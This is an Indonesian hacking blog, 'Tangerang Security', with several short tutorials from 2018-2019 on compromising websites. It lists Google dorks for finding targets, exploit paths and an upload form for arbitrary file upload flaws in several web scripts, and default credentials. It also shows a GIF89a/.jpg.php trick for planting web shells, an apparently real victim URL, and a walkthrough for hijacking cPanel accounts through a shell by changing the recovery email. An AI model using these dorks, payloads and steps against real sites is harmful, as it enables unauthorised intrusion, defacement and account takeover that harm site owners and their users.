Kamis, 10 Januari 2019

Shockwave Flash Arbitrary File Upload

Shockwave Flash Arbitary File Upload



Bahan bahan nya gan,

 Dorks : inurl:/ajax_general/ ext:php

-  Exploit : /ajax_general/swf-uploader/upload-maps-file.php

- Shell Backdoor

- CSRF : 
<form enctype="multipart/form-data" action="www.site.com/admin/content/ajax_general/swf-uploader/upload-maps-file.php" method="post"><input type="file" name="Filedata" multiple="multiple"><input type="submit" value="Upload"></form>
Ok simak ya gan,

1. Dorking duls


2. Kalo udah dapet target nya, abis itu kasih Exploit nya 

3. Ke CSRF nya buat upload shell

4. Kalo vuln bakal kek gini nih


Shell sudah terupload, akses shell? sudah tertara gan,

Example : www.example.com/file/$md5/shell.php

Sekian~ terimakasih 



Rabu, 09 Januari 2019

Tangerang Security

Tangerang Security Dibuat karena iseng dan menjadi hobi,
Saya akan share apa yang saya tahu tentang Exploit, Berita, Tutorial, IT




Semoga betah dan sering mengunjungi www.tangerang-security.web.id

Terimakasih~

Selasa, 08 Januari 2019

Tutorial Reset Password Cpanel Dengan Shell

Tutorial Reset Password Cpanel Dengan Shell




Cpanel adalah web hosting control panel yang paling populer di dunia. Fasilitas ini memudahkan pemilik account hosting untuk mengatur seluruh fasilitas web hosting yang dimilikinya.

Melalui cPanel, Anda dapat mengelola berbagai fasilitas hosting, diantaranya :
  • Mengelola e-mail
  • Mengupload website
  • Membuat dan mengupload database
  • Melihay statistik website

Siapin bahan bahan nya dulu gan,

1. Shell Backdoor
2. E-Mail

Ok simak dan ikutin tahap tahap nya gan

1. Buka shell dan buka directory /home/$user/


2. Buka file .contactmail , dan edit dengan email kalian

3. Sekarang buka cpanel nya dan buka " Atur Ulang Kata Sandi / Reset Password "


4. Dan masukan user websitenya, Lalu reset passwordnya


5. Masukan email yang kalian ubah di .contactemail


6. Setelah itu cek email kalian untuk melihat kode verifikasi nya, lalu masukan kode verifikasi nya



7. Jika sudah tinggal masukan password baru nya



Sekian dari saya, terimakasih~

Mengambil Gambar Dengan Webcam Menggunakan Webcam.js

Mengambil Gambar Dengan Webcam Menggunakan Webcam.js

Langsung ke link download nya aja ya gan, 


Note : Gambar otomatis tersimpan di folder /upload/

Ok sekian dari saya, Terimakasih

Jumat, 26 Oktober 2018

CMS Reservation Arbitary File Upload

CMS Reservation Arbitary File Upload.



Ok kita siapin bahan bahan nya

- Dork : inurl:"/reservation/img/products/"
- CSRF Online : Klik Disini!
- Shell Backdoor ext .jpg.php ( Tambahkan GIF89a di shell / uploader. )
- Exploit : editpicexec.php
- Gans ( Wajib :3 )

Ok langsung aja ke tutorialnya, ikutin step by step ya

1. Dorking menggunakan google image, dan pilih target kalian





2. Masukin exploitnya,( jika blank kemungkinan vuln )




3. Buka csrf, masukan url target kalian dan isi post data dengan " image " , LOCK!


4. Pilih shell / uploader kalian, dan upload!


 5. Vuln? jika vuln akan direct ke login page / dashboard page


6. Buka akses shell / uploader kalian di, www.site.com/reservation/img/products/shell.jpg.php


7. BOOM! Uploader saya terupload.




Ok sekian dari saya, jika tertarik/suka jangan lupa di share ^_^

Terimakasih.


Kamis, 25 Oktober 2018

AutoIndex PHP Script Shell Upload Vulnerability

Autoindex PHP Script Shell Upload Vulnerability.

Oke langsung saja ke bahan-bahanya :
- Secangkir Kopi
- Dork : inurl:/index.php?dir= intext:Powered by Autoindex PHP Script "login"
- Shell Backdoor

Ok langsung gas ke  tutorial nya :v

1. Dorking dulu , dan pilih target kalian




2. Login dengan user/pass default
    username : user
    password : user



3.  Lalu klik button upload






4. Pilih shell kalian dan upload :)




5. Vuln? maka akan seperti ini





6. Sekarang kembali lagi, akses shell? sudah tertera, skrng tinggal buka.

7. BOOOM! shell terupload :D




Ok sekian tutorial dari saya.
Terimakasih.




Jquery Filer Arbitrary File Upload

Jquery Filer Arbitary File Upload.




Ok kita siapin bahan-bahanya dulu,
- Shell Backdoor
- Dork : inurl:/factoring-company-testimonials.html
- Exploit : /plugins/jquery.filer/php/upload.php
- CSRF : Klik here!

Ok langsung aja ea ke tutorial nya,

1. Dorking dulu

2. Pilih target kalian yang mau di deface

3. Masukin exploitnya, contoh : http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/php/upload.php

4. Buka csrf nya mausakn url target nya dan isi post dataya dengan " files[] "

5. Lock!

6. Pilih shell kalian, lalu upload.

7. Jika vuln akan seperti ini

8. Lalu buka akses shell kalian :
    www.site.com/plugins/jquery.filer/uploads/shell.p.php
http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/uploads/ex.p.php

9. Ok terserah mau di apakan shell nya ^_^

Ok sekian tutorial dari saya.

Thanks,